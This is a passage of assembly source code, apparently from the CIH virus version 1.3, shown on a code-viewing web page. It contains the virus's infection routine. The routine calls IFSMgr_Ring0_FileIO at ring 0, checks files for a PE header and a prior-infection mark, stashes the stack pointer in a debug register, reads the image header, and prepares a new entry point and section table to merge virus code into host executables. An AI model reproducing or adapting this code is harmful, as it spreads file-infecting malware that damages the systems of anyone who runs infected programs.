📄 cih1.3.txt
字号:
; ***************************
dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h
jne CloseFile
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
mov al, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -